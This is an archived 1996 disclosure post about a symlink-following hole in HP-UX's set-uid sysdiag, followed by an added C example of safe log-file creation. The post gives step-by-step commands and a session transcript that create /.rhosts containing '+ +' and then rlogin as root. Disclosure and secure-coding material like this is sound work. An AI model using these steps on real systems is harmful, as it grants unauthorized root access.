Vulnerability in HP sysdiag?


   John W. Jacobi (jjacobi@pop500.gsfc.nasa.gov)
   Sat, 21 Sep 1996 23:56:42 -0700
   
Hi all,

If this is out, I apologize.

Subject: Vulnerability in HP sysdiag ???

Program and Systems that I did this on:
        The sysdiag program on
           HP 9000/700/HPUX9.05 (has PHSS_7587)
           HP 9000/800/HPUX9.04 (not sure of patch regarding diags)

To Prevent:
        For now, turn off the set uid on the programs involved.

This is how it worked for me, perhaps you too:

Problem:

        Basically, the sysdiag stuff is set-uid root.  You can exploit that
feature to create and write stuff to arbitrary files on the system as root,
while not being root.  If the target file you want to create exists, this
doesn't work.  Perhaps there is a way around that, but that ain't the point.
The point is that I used this to get root in 30 seconds on my HPs and that's
not good.  Heck, this is probably faster than asking for the root
password !!!

More on the problem:

        What happens is that a feature exists to create a log file of your
sysdiag session that can be invoked while in the program.  You give it the
name of the file to create, and if it is a sym link to a nonexistent file,
sysdiag follows the sym link and creates the file as root for you and logs
your session in it.  To show a typical vulnerability, I created /.rhosts
from a sym link in /tmp that sysdiag followed and then caused sysdiag to
echo the line "+ +" into the file.  Then I could rlogin as root.

        If /.rhosts or /etc/hosts.equiv don't exist, you can use this trick
to create and put a "+ +" in either of those files.  That's an easy way to
become root or someone else. You can do other files as well.  This ain't
cool, at all...

How I tested this on my system:

1. I logged in with my regular account
2. I made a sym link with the command: ln -s /.rhosts /tmp/tempfile
3. I ran the command: /bin/sysdiag
4. From the DUI> prompt I typed: outfile /tmp/f1
5. From the DUI> prompt I typed: + +
6. From the DUI> prompt I typed: redo
7. When my previous command echoed to the screen I pressed <return>.
8. From the DUI> prompt I typed: exit
9. Now at the shell prompt, and out of sysdiag, I typed:
        rlogin localhost -l root
10. Once logged in I typed: id
        and it said I was root...

This is the script of my sysdiag session:

Script started on Sat Sep 21 23:29:10 1996
$ id
uid=1648(jjacobi) gid=999(systems)
$ ls -l /tmp
total 0
$ ls -l /.rhosts
/.rhosts not found
$ ln -s /.rhosts /tmp/tempfile
$ ls -l /tmp
total 2
lrwx--x--x   1 jjacobi  systems        8 Sep 21 23:29 tempfile -> /.rhosts
$ ls -l /.rhosts
/.rhosts not found
$ /bin/sysdiag
*****************************************************************
******                                                     ******
******               ONLINE DIAGNOSTIC SYSTEM              ******
******                                                     ******
******          (C) Copyright Hewlett Packard Co.          ******
******               1987, 1989, 1990, 1992                ******
******                 All Rights Reserved                 ******
******                                                     ******
******              DUI Version A.02.24                    ******
******         Diagnostic Monitor Version   A.02.19        ******
******                                                     ******
*****************************************************************

    Type "HELP" for assistance.

DUI >outfile /tmp/tempfile
DUI >+ +
     ^
*** SYNTAX ERROR (DUISERR 501)

DUI >redo
+ +

DUI >+ +
     ^
*** SYNTAX ERROR (DUISERR 501)

DUI >exit
$ ls -l /tmp
total 2
lrwx--x--x   1 jjacobi  systems        8 Sep 21 23:29 tempfile -> /.rhosts
$ ls -l /.rhosts
-rw-------   1 root     systems      891 Sep 21 23:29 /.rhosts
$ id
uid=1648(jjacobi) gid=999(systems)
$ rlogin localhost -l root
Please wait...checking for disk quotas

Value of TERM has been set to "vt100".
# id
uid=0(root) gid=3(sys)
# cat /.rhosts
DUI >+
+

^
*** SYNTAX ERROR (DUISERR
501)

DUI
>redo
+
+
DUI >+
+

^
*** SYNTAX ERROR (DUISERR
501)

DUI
>exit
# exit
logout root
Connection closed.
$ id
uid=1648(jjacobi) gid=999(systems)
$ exit

script done on Sat Sep 21 23:30:38 1996



You have reached the end of my message, thank you for reading it.

John W. Jacobi
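
The root cause described in the message above is a set-uid program creating a user-named log file with root's rights and following a symlink while doing so. The following is an added example, not part of the original post and not HP's code, of how a set-uid program can open such a file safely; the names open_session_log and demo_symlink_refused are hypothetical, and the scratch directory under /tmp is constructed for the demonstration.

```c
#define _POSIX_C_SOURCE 200809L
#include <errno.h>
#include <fcntl.h>
#include <stdio.h>
#include <stdlib.h>
#include <sys/stat.h>
#include <unistd.h>

/* Hypothetical helper for a set-uid program: returns an fd, or -1. */
int open_session_log(const char *path)
{
    uid_t saved = geteuid();
    int fd, err;
    /* Open as the invoking user so the kernel checks that user's rights. */
    if (seteuid(getuid()) != 0) return -1;
    /* O_EXCL refuses any existing name, including a dangling symlink;
     * O_NOFOLLOW refuses a symlink as the final path component. */
    fd = open(path, O_WRONLY | O_CREAT | O_EXCL | O_NOFOLLOW, 0600);
    err = errno;
    if (seteuid(saved) != 0) {   /* cannot restore privilege: fail closed */
        if (fd >= 0) close(fd);
        return -1;
    }
    errno = err;
    return fd;
}

/* Constructed scenario in a scratch directory: returns 1 if a dangling
 * symlink is refused, its target stays absent, and a fresh name works. */
int demo_symlink_refused(void)
{
    char dir[] = "/tmp/logdemoXXXXXX", lnk[64], tgt[64], fresh[64];
    struct stat st;
    int fd_link, fd_new, ok;
    if (mkdtemp(dir) == NULL) return 0;
    snprintf(lnk, sizeof lnk, "%s/session.log", dir);
    snprintf(tgt, sizeof tgt, "%s/target", dir);
    snprintf(fresh, sizeof fresh, "%s/fresh.log", dir);
    if (symlink(tgt, lnk) != 0) return 0;
    fd_link = open_session_log(lnk);           /* must be refused */
    ok = fd_link == -1 && lstat(tgt, &st) == -1;
    fd_new = open_session_log(fresh);          /* ordinary use still works */
    ok = ok && fd_new >= 0;
    if (fd_link >= 0) close(fd_link);
    if (fd_new >= 0) close(fd_new);
    unlink(tgt); unlink(lnk); unlink(fresh); rmdir(dir);
    return ok;
}
int main(void) { return demo_symlink_refused() ? 0 : 1; }
```

Dropping to the real uid for the open is what protects against symlinks in earlier path components, since the flags only cover the final name.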

